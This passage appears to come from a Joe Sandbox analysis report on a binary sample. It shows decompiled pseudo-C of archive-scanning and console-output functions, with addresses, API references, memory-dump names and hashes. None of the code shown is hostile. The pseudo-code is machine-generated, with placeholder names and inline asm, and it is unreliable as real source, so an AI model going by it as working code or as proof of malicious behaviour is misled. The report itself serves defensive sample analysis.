					_t82 = _t84 + 0xd0;
					 *((intOrPtr*)(_t84 + 0xd4)) = 0;
					 *((short*)( *((intOrPtr*)(_t84 + 0xd0)))) = 0;
					if( *((intOrPtr*)(_t87 + 8)) != 0) {
						L00B12F14(_t82,  *((intOrPtr*)(_t87 + 8)));
						if( *((intOrPtr*)(_t87 + 0xc)) != 0) {
							E00B182BD(_t82);
						}
						E00B120E3( *(_t84 + 0xb0), _t82);
					}
					E00B12059( *(_t84 + 0xb0), _t82, _t84 + 0xc4);
					E00B11FE9( *(_t84 + 0xb0));
					if( *((intOrPtr*)(_t84 + 0xb9)) != 0) {
						L00B11FDA( *(_t84 + 0xb0));
					}
				}
				if( *((intOrPtr*)(_t84 + 0xa4)) != 0) {
					if( *((intOrPtr*)(_t84 + 0xbc)) >= 1) {
						_t80 = _t84 + 0x24;
						_t65 = _t84 + 0x18;
						 *((intOrPtr*)(_t84 + 0x28)) = 0;
						 *((short*)( *((intOrPtr*)(_t84 + 0x24)))) = 0;
						 *((intOrPtr*)(_t65 + 4)) = 0;
						 *((char*)( *_t65)) = 0;
						if( *((intOrPtr*)(_t84 + 0xbc)) > 1 ||  *((intOrPtr*)(_t87 + 0x17)) == 0) {
							E00B1275A(_t65,  *((intOrPtr*)(_t87 + 0x10)));
							if( *((intOrPtr*)(_t87 + 8)) != 0) {
								L00B12F14(_t80,  *((intOrPtr*)(_t87 + 8)));
							}
						}
					}
					E00B4B752(_t84);
				}
				_t39 = L00B4574E();
				LeaveCriticalSection(0xb9a8a0);
				 *[fs:0x0] =  *((intOrPtr*)(_t87 - 0xc));
				return _t39;
			}








                                                                                                                    0x00b4c66a
                                                                                                                    0x00b4c66f
                                                                                                                    0x00b4c678
                                                                                                                    0x00b4c67b
                                                                                                                    0x00b4c67e
                                                                                                                    0x00b4c689
                                                                                                                    0x00b4c68c
                                                                                                                    0x00b4c7b9
                                                                                                                    0x00b4c69e
                                                                                                                    0x00b4c6a0
                                                                                                                    0x00b4c6a4
                                                                                                                    0x00b4c6ac
                                                                                                                    0x00b4c6b4
                                                                                                                    0x00b4c6bc
                                                                                                                    0x00b4c6c0
                                                                                                                    0x00b4c6c0
                                                                                                                    0x00b4c6cf
                                                                                                                    0x00b4c6de
                                                                                                                    0x00b4c6e6
                                                                                                                    0x00b4c6e9
                                                                                                                    0x00b4c6ec
                                                                                                                    0x00b4c6f3
                                                                                                                    0x00b4c6fb
                                                                                                                    0x00b4c6ff
                                                                                                                    0x00b4c6ff
                                                                                                                    0x00b4c70b
                                                                                                                    0x00b4c70b
                                                                                                                    0x00b4c71e
                                                                                                                    0x00b4c729
                                                                                                                    0x00b4c734
                                                                                                                    0x00b4c73c
                                                                                                                    0x00b4c73c
                                                                                                                    0x00b4c734
                                                                                                                    0x00b4c747
                                                                                                                    0x00b4c750
                                                                                                                    0x00b4c755
                                                                                                                    0x00b4c758
                                                                                                                    0x00b4c75b
                                                                                                                    0x00b4c75e
                                                                                                                    0x00b4c763
                                                                                                                    0x00b4c766
                                                                                                                    0x00b4c76f
                                                                                                                    0x00b4c779
                                                                                                                    0x00b4c781
                                                                                                                    0x00b4c788
                                                                                                                    0x00b4c788
                                                                                                                    0x00b4c781
                                                                                                                    0x00b4c76f
                                                                                                                    0x00b4c78f
                                                                                                                    0x00b4c78f
                                                                                                                    0x00b4c794
                                                                                                                    0x00b4c7a0
                                                                                                                    0x00b4c7ae
                                                                                                                    0x00b4c7b6

                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B4C66A
                                                                                                                    • EnterCriticalSection.KERNEL32(00B9A8A0,?,00000001,?,?,00B4C9F1,?,0000006F,0000006F,?,?,00000000), ref: 00B4C67E
                                                                                                                    • fputs.MSVCRT ref: 00B4C6CF
                                                                                                                    • LeaveCriticalSection.KERNEL32(00B9A8A0,?,00000001,?,?,00B4C9F1,?,0000006F,0000006F,?,?,00000000), ref: 00B4C7A0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalSection$EnterH_prologLeavefputs
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2174113412-0
                                                                                                                    • Opcode ID: 53aab4721db9bebc41e3af64f02f6f4a36ed6fdc015fb454b6c22b660517947e
                                                                                                                    • Instruction ID: d3b1abfe85061792a1228f7658c40616abf9d0cb00d686d3f792ecd6277561c9
                                                                                                                    • Opcode Fuzzy Hash: 53aab4721db9bebc41e3af64f02f6f4a36ed6fdc015fb454b6c22b660517947e
                                                                                                                    • Instruction Fuzzy Hash: 8B41A031601785DFCF21AF64C490BBABBE2FF45700F0448AEE55A97251CB316D51EB92
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B4C538 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00B4C538(struct _IO_FILE** __ecx, void* __edx, void* __eflags) {
				void* _t17;
				struct _IO_FILE** _t27;
				void* _t33;

				L00B7F140(E00B86928, _t33);
				_t27 = __ecx;
				E00B126D9(_t33 - 0x18);
				 *(_t33 - 4) =  *(_t33 - 4) & 0x00000000;
				E00B4452A(_t33 - 0x18, __edx);
				fputs( *(_t33 + 8),  *_t27);
				fputs(0xb8cfc8,  *_t27);
				fputs( *(_t33 - 0x18),  *_t27);
				_t17 = E00B11E89(E00B11FE9(_t27),  *(_t33 - 0x18));
				 *[fs:0x0] =  *((intOrPtr*)(_t33 - 0xc));
				return _t17;
			}






                                                                                                                    0x00b4c53d
                                                                                                                    0x00b4c547
                                                                                                                    0x00b4c54e
                                                                                                                    0x00b4c553
                                                                                                                    0x00b4c55c
                                                                                                                    0x00b4c56c
                                                                                                                    0x00b4c575
                                                                                                                    0x00b4c57c
                                                                                                                    0x00b4c58b
                                                                                                                    0x00b4c596
                                                                                                                    0x00b4c59e

                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B4C53D
                                                                                                                    • fputs.MSVCRT ref: 00B4C56C
                                                                                                                    • fputs.MSVCRT ref: 00B4C575
                                                                                                                    • fputs.MSVCRT ref: 00B4C57C
                                                                                                                      • Part of subcall function 00B11FE9: fputc.MSVCRT ref: 00B11FF0
                                                                                                                      • Part of subcall function 00B11E89: free.MSVCRT(?,00B36CD6,00000000,00000000,00000001,?,00B110EB), ref: 00B11E8D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: fputs$H_prologfputcfree
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3247574066-0
                                                                                                                    • Opcode ID: a7e540bd219e1fdf288f9cd56795bfb6fb99c0e353bc58f210e72ce150be735d
                                                                                                                    • Instruction ID: a15c7f9a40afc27bf845b5acbe1706ca4039eb9ae1eb105ae5e6c628af367889
                                                                                                                    • Opcode Fuzzy Hash: a7e540bd219e1fdf288f9cd56795bfb6fb99c0e353bc58f210e72ce150be735d
                                                                                                                    • Instruction Fuzzy Hash: 62F09032D00019ABCB05BB98DC46AEEBFB6EF94310F1040A6E905631B1EB754AA5DFC0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B32B6F Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 443COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 76%
                                                                                                                    			E00B32B6F(void* __ecx, signed int __edx, void* __eflags) {
				signed int _t223;
				signed int _t225;
				signed int _t226;
				void* _t228;
				signed int _t230;
				signed int _t236;
				signed int _t240;
				signed int _t242;
				signed int _t245;
				void* _t250;
				void* _t251;
				signed int _t255;
				signed char _t261;
				signed int _t265;
				signed int _t275;
				intOrPtr _t277;
				signed int _t283;
				signed int _t294;
				signed int _t297;
				intOrPtr* _t302;
				signed int _t312;
				signed int _t332;
				signed int _t351;
				signed int _t368;
				signed int _t392;
				signed int _t396;
				signed int _t398;
				signed int _t399;
				intOrPtr* _t400;
				void* _t404;

				L00B7F140(E00B84B46, _t404);
				 *(_t404 - 0x10) = __edx;
				E00B2EFE3(_t404 - 0x160);
				_t223 =  *(_t404 - 0x10);
				_t392 =  *(_t404 + 0xc);
				_t312 = 0;
				 *(_t404 - 0xc8) = _t392;
				_t410 =  *((intOrPtr*)(_t223 + 0xe));
				 *(_t404 - 4) = 0;
				if( *((intOrPtr*)(_t223 + 0xe)) == 0) {
					_t225 =  *((intOrPtr*)( *_t392 + 8))();
					__eflags = _t225;
					if(_t225 == 0) {
						_t226 =  *(_t404 - 0x10);
						 *((char*)(_t404 - 0x130)) =  *((intOrPtr*)(_t226 + 0x10));
						 *((char*)(_t404 - 0x12f)) =  *((intOrPtr*)(_t226 + 0xf));
						 *((char*)(_t404 - 0x12c)) =  *((intOrPtr*)(_t226 + 0xd));
						 *((char*)(_t404 - 0x12e)) =  *((intOrPtr*)(__ecx + 0xc));
						 *((char*)(_t404 - 0x12d)) =  *((intOrPtr*)(__ecx + 0xd));
						_t228 = E00B12D90(_t404 - 0x50);
						 *(_t404 - 4) = 2;
						_push(_t404 - 0x160);
						_push(_t228);
						_t390 =  *((intOrPtr*)( *(_t404 - 0x10) + 0x14));
						_t230 = E00B2F3F7(__ecx,  *((intOrPtr*)( *(_t404 - 0x10) + 0x14)));
						 *(_t404 - 4) =  *(_t404 - 4) & 0x00000000;
						_t396 = _t230;
						E00B11E89(_t230,  *((intOrPtr*)(_t404 - 0x50)));
						__eflags = _t396;
						if(_t396 == 0) {
							_t225 =  *((intOrPtr*)( *_t392 + 0xc))(_t404 - 0x128);
							__eflags = _t225;
							if(_t225 != 0) {
								goto L3;
							}
							goto L8;
						}
						__eflags = _t396 - 0x80004004;
						if(_t396 != 0x80004004) {
							E00B1275A( *(_t404 + 8), "Scanning error");
						}
						goto L68;
					}
					L3:
					_t396 = _t225;
					goto L68;
				} else {
					L00B3312E(_t404 - 0x1bc, _t410);
					 *(_t404 - 0x1bc) =  *(_t404 - 0x1bc) | 0xffffffff;
					 *(_t404 - 0x1b8) =  *(_t404 - 0x1b8) | 0xffffffff;
					 *(_t404 - 4) = 1;
					 *((intOrPtr*)(_t404 - 0x19c)) = 0;
					E00B56B33(_t404 - 0x13c);
					_push(_t404 - 0x1bc);
					E00B36287(_t404 - 0x13c);
					 *(_t404 - 4) =  *(_t404 - 4) & 0;
					E00B30DCE(_t404 - 0x1bc);
					L8:
					L00B3315C(_t404 - 0xc0);
					_t398 =  *(_t404 - 0x10);
					_push(_t398);
					 *(_t404 - 4) = 3;
					_t236 = E00B3255B(_t404 - 0xc0);
					if(_t236 == _t312) {
						__eflags =  *((char*)(_t398 + 0xe));
						 *((intOrPtr*)(_t404 - 0x88)) =  *((intOrPtr*)(_t404 - 0x100));
						 *((intOrPtr*)(_t404 - 0x84)) =  *((intOrPtr*)(_t404 - 0xfc));
						 *(_t404 - 0x24) = _t312;
						 *(_t404 - 0x20) = _t312;
						if( *((char*)(_t398 + 0xe)) == 0) {
							_t332 =  *(_t404 - 0x10c);
							_t240 =  *((intOrPtr*)(_t404 - 0x110)) +  *((intOrPtr*)(_t404 - 0x108));
							__eflags = _t240;
							_t390 =  *_t392;
							asm("adc ecx, [ebp-0x104]");
							 *(_t404 - 0x24) = _t240;
							 *(_t404 - 0x20) = _t332;
							_t236 =  *((intOrPtr*)( *_t392 + 0x14))(_t240, _t332);
						} else {
							_t236 =  *((intOrPtr*)( *_t392 + 0x10))(1, _t312);
						}
						__eflags = _t236 - _t312;
						if(_t236 != _t312) {
							goto L9;
						} else {
							 *(_t404 - 4) = 4;
							_t242 = L00B6B2E0(0x8000);
							__eflags = _t242 - _t312;
							 *(_t404 + 8) = _t242;
							__eflags = _t242 & 0xffffff00 | _t242 != _t312;
							if((_t242 & 0xffffff00 | _t242 != _t312) != 0) {
								 *(_t404 - 0x40) = _t312;
								 *(_t404 - 0x3c) = _t312;
								_t245 =  *((intOrPtr*)( *_t392 + 0x20))(_t404 - 0xc0);
								__eflags = _t245 - _t312;
								if(_t245 != _t312) {
									L65:
									_t396 = _t245;
									L66:
									L00B6B300( *(_t404 + 8));
									L67:
									 *(_t404 - 4) =  *(_t404 - 4) & 0x00000000;
									L00B331CA(_t404 - 0xc0);
									L68:
									 *(_t404 - 4) =  *(_t404 - 4) | 0xffffffff;
									E00B3086E(_t404 - 0x160);
									 *[fs:0x0] =  *((intOrPtr*)(_t404 - 0xc));
									return _t396;
								}
								__eflags =  *((intOrPtr*)(_t404 - 0x138)) - _t312;
								 *(_t404 - 0x14) = _t312;
								if( *((intOrPtr*)(_t404 - 0x138)) <= _t312) {
									L64:
									_t245 =  *((intOrPtr*)( *_t392 + 0x30))(_t404 - 0xc0);
									goto L65;
								}
								while(1) {
									 *(_t404 + 0xc) = _t312;
									 *(_t404 - 4) = 5;
									E00B12D90(_t404 - 0x30);
									 *(_t404 - 0x18) =  *(_t404 - 0x18) & 0x00000000;
									 *(_t404 - 0x54) =  *(_t404 - 0x54) & 0x00000000;
									__eflags =  *((char*)(_t398 + 0xe));
									 *(_t404 - 4) = 6;
									if( *((char*)(_t398 + 0xe)) == 0) {
										goto L25;
									}
									_push(8);
									_t302 = E00B11E55();
									__eflags = _t302 - _t312;
									if(_t302 == _t312) {
										_t302 = 0;
										__eflags = 0;
									} else {
										 *(_t302 + 4) = _t312;
										 *_t302 = 0xb8af84;
									}
									E00B1A98B(_t404 + 0xc, _t302);
									L47:
									_t396 =  *((intOrPtr*)( *_t392 + 0x24))( *((intOrPtr*)(_t404 - 0x30)),  *(_t404 - 0x18));
									__eflags = _t396 - _t312;
									if(_t396 != _t312) {
										L60:
										_push( *((intOrPtr*)(_t404 - 0x30)));
										L61:
										E00B11E89(_t263);
										_t265 =  *(_t404 + 0xc);
										 *(_t404 - 4) = 4;
										__eflags = _t265 - _t312;
										L62:
										if(__eflags != 0) {
											 *((intOrPtr*)( *_t265 + 8))(_t265);
										}
										goto L66;
									}
									 *(_t404 - 0x38) = _t312;
									 *(_t404 - 0x34) = _t312;
									E00B32935(_t404 - 0xc0);
									__eflags =  *(_t404 - 0x18);
									if( *(_t404 - 0x18) != 0) {
										L55:
										_t351 = _t404 - 0xc0;
										E00B32A2E(_t351, _t390,  *(_t404 - 0x18),  *(_t404 - 0x54), _t404 - 0x30);
										__eflags =  *(_t404 - 0x18);
										_t396 =  *((intOrPtr*)( *_t392 + 0x2c))( *(_t404 - 0x38),  *(_t404 - 0x34), _t404 - 0xc0, _t351 & 0xffffff00 |  *(_t404 - 0x18) == 0x00000000);
										__eflags = _t396 - _t312;
										if(_t396 != _t312) {
											goto L60;
										}
										_t396 =  *((intOrPtr*)( *_t392 + 0x18))(_t404 - 0x40);
										_push( *((intOrPtr*)(_t404 - 0x30)));
										__eflags = _t396 - _t312;
										if(_t396 != _t312) {
											goto L61;
										}
										E00B11E89(_t263);
										 *(_t404 - 4) = 4;
										L00B4F28F(_t404 + 0xc);
										L37:
										 *(_t404 - 0x14) =  *(_t404 - 0x14) + 1;
										__eflags =  *(_t404 - 0x14) -  *((intOrPtr*)(_t404 - 0x138));
										if( *(_t404 - 0x14) <  *((intOrPtr*)(_t404 - 0x138))) {
											_t398 =  *(_t404 - 0x10);
											continue;
										}
										goto L64;
									}
									 *(_t404 - 0x1c) = _t312;
									while(1) {
										__eflags =  *(_t404 - 0x1c);
										if( *(_t404 - 0x1c) != 0) {
											goto L52;
										}
										L51:
										_t396 =  *((intOrPtr*)( *_t392 + 0x18))(_t404 - 0x40);
										__eflags = _t396 - _t312;
										if(_t396 != _t312) {
											goto L60;
										}
										L52:
										_t275 =  *(_t404 + 0xc);
										_t390 = _t404 - 0x44;
										_t396 =  *((intOrPtr*)( *_t275 + 0xc))(_t275,  *(_t404 + 8), 0x8000, _t404 - 0x44);
										__eflags = _t396 - _t312;
										if(_t396 != _t312) {
											goto L60;
										}
										__eflags =  *((intOrPtr*)(_t404 - 0x44)) - _t312;
										if( *((intOrPtr*)(_t404 - 0x44)) == _t312) {
											goto L55;
										}
										E00B32978(_t404 - 0xc0,  *(_t404 + 8),  *((intOrPtr*)(_t404 - 0x44)));
										_t277 =  *((intOrPtr*)(_t404 - 0x44));
										 *(_t404 - 0x38) =  *(_t404 - 0x38) + _t277;
										asm("adc [ebp-0x34], ecx");
										 *(_t404 - 0x40) =  *(_t404 - 0x40) + _t277;
										asm("adc [ebp-0x3c], ecx");
										 *(_t404 - 0x1c) =  *(_t404 - 0x1c) + 1;
										__eflags =  *(_t404 - 0x1c);
										if( *(_t404 - 0x1c) != 0) {
											goto L52;
										}
										goto L51;
									}
									L25:
									_t399 =  *(_t404 - 0x14);
									_t250 = L00B2EF38(_t404 - 0x160, _t404 - 0x16c, _t399);
									 *(_t404 - 4) = 7;
									_t251 = L00B12F78(_t404 - 0x30, _t250);
									 *(_t404 - 4) = 6;
									E00B11E89(_t251,  *((intOrPtr*)(_t404 - 0x16c)));
									_t400 =  *((intOrPtr*)( *((intOrPtr*)(_t404 - 0x13c)) + _t399 * 4));
									__eflags =  *((intOrPtr*)(_t400 + 0x38)) - _t312;
									 *(_t404 - 0x54) =  *((intOrPtr*)(_t400 + 0x24));
									if( *((intOrPtr*)(_t400 + 0x38)) == _t312) {
										_push(0x88);
										_t255 = E00B11E55();
										 *(_t404 - 0x1c) = _t255;
										__eflags = _t255 - _t312;
										 *(_t404 - 4) = 8;
										if(_t255 != _t312) {
											_t312 = E00B1AD30(_t255);
										}
										 *(_t404 - 4) = 6;
										 *((char*)(_t312 + 0x1c)) =  *((intOrPtr*)( *(_t404 - 0x10) + 0xc));
										E00B1A98B(_t404 + 0xc, _t312);
										_t261 =  *(_t400 + 0x20) >> 0x00000004 & 0x00000001;
										__eflags = _t261;
										 *(_t404 - 0x18) = _t261;
										if(_t261 != 0) {
											L46:
											_t312 = 0;
											__eflags = 0;
											goto L47;
										} else {
											L00B2EF0D(_t404 - 0x160, _t404 - 0x50,  *(_t404 - 0x14));
											 *(_t404 - 4) = 9;
											 *(_t312 + 0x7c) =  *(_t312 + 0x7c) & 0x00000000;
											 *((char*)(_t404 - 0x60)) =  *((intOrPtr*)( *(_t404 - 0x10) + 0xd));
											_t283 = E00B1783F( *((intOrPtr*)(_t404 - 0x50)),  *((intOrPtr*)(_t404 - 0x60)));
											__eflags = _t283;
											if(_t283 != 0) {
												_t284 =  *(_t404 - 0x10);
												__eflags =  *((char*)(_t284 + 0xe));
												if( *((char*)(_t284 + 0xe)) != 0) {
													L45:
													 *(_t404 - 4) = 6;
													E00B11E89(_t284,  *((intOrPtr*)(_t404 - 0x50)));
													goto L46;
												}
												 *(_t404 - 0x5c) =  *(_t404 - 0x5c) & 0x00000000;
												 *(_t404 - 0x58) =  *(_t404 - 0x58) & 0x00000000;
												_t284 =  *((intOrPtr*)( *((intOrPtr*)(_t312 + 4)) + 0xc))(_t312 + 4, _t404 - 0x5c);
												__eflags = _t284;
												if(_t284 != 0) {
													goto L45;
												}
												_t390 =  *_t400;
												_t284 =  *(_t404 - 0x58);
												_t368 =  *(_t404 - 0x5c);
												__eflags =  *(_t404 - 0x58) -  *((intOrPtr*)(_t400 + 4));
												if(__eflags < 0) {
													goto L45;
												}
												if(__eflags > 0) {
													L44:
													asm("sbb eax, esi");
													 *(_t404 - 0x24) =  *(_t404 - 0x24) + _t368 - _t390;
													asm("adc [ebp-0x20], eax");
													_t396 =  *((intOrPtr*)( *_t392 + 0x14))( *(_t404 - 0x24),  *(_t404 - 0x20));
													__eflags = _t396;
													if(_t396 != 0) {
														_push( *((intOrPtr*)(_t404 - 0x50)));
														L59:
														E00B11E89(E00B11E89(_t284),  *((intOrPtr*)(_t404 - 0x30)));
														_t265 =  *(_t404 + 0xc);
														 *(_t404 - 4) = 4;
														__eflags = _t265;
														goto L62;
													}
													goto L45;
												}
												__eflags = _t368 - _t390;
												if(_t368 <= _t390) {
													goto L45;
												}
												goto L44;
											}
											_t284 =  *((intOrPtr*)( *_t392 + 0x28))(_t404 - 0x50, GetLastError());
											 *((intOrPtr*)(_t404 - 0x88)) =  *((intOrPtr*)(_t404 - 0x88)) + 1;
											_t396 = _t284;
											_push( *((intOrPtr*)(_t404 - 0x50)));
											asm("adc dword [ebp-0x84], 0x0");
											__eflags = _t396 - 1;
											if(_t396 != 1) {
												goto L59;
											}
											E00B11E89(E00B11E89(_t284),  *((intOrPtr*)(_t404 - 0x30)));
											_t294 =  *(_t404 + 0xc);
											__eflags = _t294;
											 *(_t404 - 4) = 4;
											if(_t294 != 0) {
												 *((intOrPtr*)( *_t294 + 8))(_t294);
											}
											_t312 = 0;
											__eflags = 0;
											goto L37;
										}
									}
									_push(0x20);
									_t297 = E00B11E55();
									__eflags = _t297 - _t312;
									if(_t297 != _t312) {
										 *(_t297 + 4) = _t312;
										 *(_t297 + 0x1c) = _t312;
										 *_t297 = 0xb89c3c;
										_t312 = _t297;
									}
									E00B1A98B(_t404 + 0xc, _t312);
									 *((intOrPtr*)(_t312 + 0x18)) =  *((intOrPtr*)(_t400 + 0x38));
									 *((intOrPtr*)(_t312 + 0x10)) = 0;
									_t104 = _t312 + 0x1c; // 0x1c
									 *((intOrPtr*)(_t312 + 8)) =  *((intOrPtr*)(_t400 + 0x34));
									 *((intOrPtr*)(_t312 + 0x14)) = 0;
									E00B1A98B(_t104, 0);
									goto L46;
								}
							}
							_t396 = 0x8007000e;
							goto L66;
						}
					}
					L9:
					_t396 = _t236;
					goto L67;
				}
			}

































                                                                                                                    0x00b32b74
                                                                                                                    0x00b32b84
                                                                                                                    0x00b32b8d
                                                                                                                    0x00b32b92
                                                                                                                    0x00b32b95
                                                                                                                    0x00b32b98
                                                                                                                    0x00b32b9a
                                                                                                                    0x00b32ba0
                                                                                                                    0x00b32ba3
                                                                                                                    0x00b32ba6
                                                                                                                    0x00b32bff
                                                                                                                    0x00b32c02
                                                                                                                    0x00b32c04
                                                                                                                    0x00b32c0d
                                                                                                                    0x00b32c13
                                                                                                                    0x00b32c1f
                                                                                                                    0x00b32c28
                                                                                                                    0x00b32c2e
                                                                                                                    0x00b32c37
                                                                                                                    0x00b32c40
                                                                                                                    0x00b32c4b
                                                                                                                    0x00b32c4f
                                                                                                                    0x00b32c50
                                                                                                                    0x00b32c56
                                                                                                                    0x00b32c59
                                                                                                                    0x00b32c5e
                                                                                                                    0x00b32c62
                                                                                                                    0x00b32c67
                                                                                                                    0x00b32c6c
                                                                                                                    0x00b32c6f
                                                                                                                    0x00b32c9a
                                                                                                                    0x00b32c9d
                                                                                                                    0x00b32c9f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b32c9f
                                                                                                                    0x00b32c71
                                                                                                                    0x00b32c77
                                                                                                                    0x00b32c85
                                                                                                                    0x00b32c85
                                                                                                                    0x00000000
                                                                                                                    0x00b32c77
                                                                                                                    0x00b32c06
                                                                                                                    0x00b32c06
                                                                                                                    0x00000000
                                                                                                                    0x00b32ba8
                                                                                                                    0x00b32bae
                                                                                                                    0x00b32bb3
                                                                                                                    0x00b32bba
                                                                                                                    0x00b32bc7
                                                                                                                    0x00b32bcb
                                                                                                                    0x00b32bd1
                                                                                                                    0x00b32be2
                                                                                                                    0x00b32be3
                                                                                                                    0x00b32be8
                                                                                                                    0x00b32bf1
                                                                                                                    0x00b32ca5
                                                                                                                    0x00b32cab
                                                                                                                    0x00b32cb0
                                                                                                                    0x00b32cb9
                                                                                                                    0x00b32cba
                                                                                                                    0x00b32cbe
                                                                                                                    0x00b32cc5
                                                                                                                    0x00b32cd4
                                                                                                                    0x00b32cd8
                                                                                                                    0x00b32ce4
                                                                                                                    0x00b32cea
                                                                                                                    0x00b32ced
                                                                                                                    0x00b32cf0
                                                                                                                    0x00b32d04
                                                                                                                    0x00b32d0a
                                                                                                                    0x00b32d0a
                                                                                                                    0x00b32d10
                                                                                                                    0x00b32d12
                                                                                                                    0x00b32d18
                                                                                                                    0x00b32d1b
                                                                                                                    0x00b32d22
                                                                                                                    0x00b32cf2
                                                                                                                    0x00b32cf9
                                                                                                                    0x00b32cf9
                                                                                                                    0x00b32d25
                                                                                                                    0x00b32d27
                                                                                                                    0x00000000
                                                                                                                    0x00b32d29
                                                                                                                    0x00b32d2e
                                                                                                                    0x00b32d32
                                                                                                                    0x00b32d37
                                                                                                                    0x00b32d39
                                                                                                                    0x00b32d3f
                                                                                                                    0x00b32d41
                                                                                                                    0x00b32d58
                                                                                                                    0x00b32d5b
                                                                                                                    0x00b32d5e
                                                                                                                    0x00b32d61
                                                                                                                    0x00b32d63
                                                                                                                    0x00b330db
                                                                                                                    0x00b330db
                                                                                                                    0x00b330dd
                                                                                                                    0x00b330e0
                                                                                                                    0x00b330e5
                                                                                                                    0x00b330e5
                                                                                                                    0x00b330ef
                                                                                                                    0x00b330f4
                                                                                                                    0x00b330f4
                                                                                                                    0x00b330fe
                                                                                                                    0x00b3310b
                                                                                                                    0x00b33113
                                                                                                                    0x00b33113
                                                                                                                    0x00b32d69
                                                                                                                    0x00b32d6f
                                                                                                                    0x00b32d72
                                                                                                                    0x00b330cd
                                                                                                                    0x00b330d8
                                                                                                                    0x00000000
                                                                                                                    0x00b330d8
                                                                                                                    0x00b32d7d
                                                                                                                    0x00b32d7d
                                                                                                                    0x00b32d83
                                                                                                                    0x00b32d87
                                                                                                                    0x00b32d8c
                                                                                                                    0x00b32d90
                                                                                                                    0x00b32d94
                                                                                                                    0x00b32d98
                                                                                                                    0x00b32d9c
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b32d9e
                                                                                                                    0x00b32da0
                                                                                                                    0x00b32da5
                                                                                                                    0x00b32da8
                                                                                                                    0x00b32db5
                                                                                                                    0x00b32db5
                                                                                                                    0x00b32daa
                                                                                                                    0x00b32daa
                                                                                                                    0x00b32dad
                                                                                                                    0x00b32dad
                                                                                                                    0x00b32dbb
                                                                                                                    0x00b32f9b
                                                                                                                    0x00b32fa8
                                                                                                                    0x00b32faa
                                                                                                                    0x00b32fac
                                                                                                                    0x00b330b1
                                                                                                                    0x00b330b1
                                                                                                                    0x00b330b4
                                                                                                                    0x00b330b4
                                                                                                                    0x00b330b9
                                                                                                                    0x00b330bd
                                                                                                                    0x00b330c1
                                                                                                                    0x00b330c3
                                                                                                                    0x00b330c3
                                                                                                                    0x00b330c8
                                                                                                                    0x00b330c8
                                                                                                                    0x00000000
                                                                                                                    0x00b330c3
                                                                                                                    0x00b32fb8
                                                                                                                    0x00b32fbb
                                                                                                                    0x00b32fbe
                                                                                                                    0x00b32fc3
                                                                                                                    0x00b32fc7
                                                                                                                    0x00b33032
                                                                                                                    0x00b33035
                                                                                                                    0x00b33042
                                                                                                                    0x00b33047
                                                                                                                    0x00b33063
                                                                                                                    0x00b33065
                                                                                                                    0x00b33067
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b33074
                                                                                                                    0x00b33076
                                                                                                                    0x00b33079
                                                                                                                    0x00b3307b
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b3307d
                                                                                                                    0x00b33083
                                                                                                                    0x00b3308a
                                                                                                                    0x00b32f1c
                                                                                                                    0x00b32f1c
                                                                                                                    0x00b32f22
                                                                                                                    0x00b32f28
                                                                                                                    0x00b32d7a
                                                                                                                    0x00000000
                                                                                                                    0x00b32d7a
                                                                                                                    0x00000000
                                                                                                                    0x00b32f2e
                                                                                                                    0x00b32fc9
                                                                                                                    0x00b32fcc
                                                                                                                    0x00b32fcc
                                                                                                                    0x00b32fd0
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b32fd2
                                                                                                                    0x00b32fdd
                                                                                                                    0x00b32fdf
                                                                                                                    0x00b32fe1
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b32fe7
                                                                                                                    0x00b32fe7
                                                                                                                    0x00b32fea
                                                                                                                    0x00b32ffc
                                                                                                                    0x00b32ffe
                                                                                                                    0x00b33000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b33006
                                                                                                                    0x00b33009
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b33017
                                                                                                                    0x00b3301c
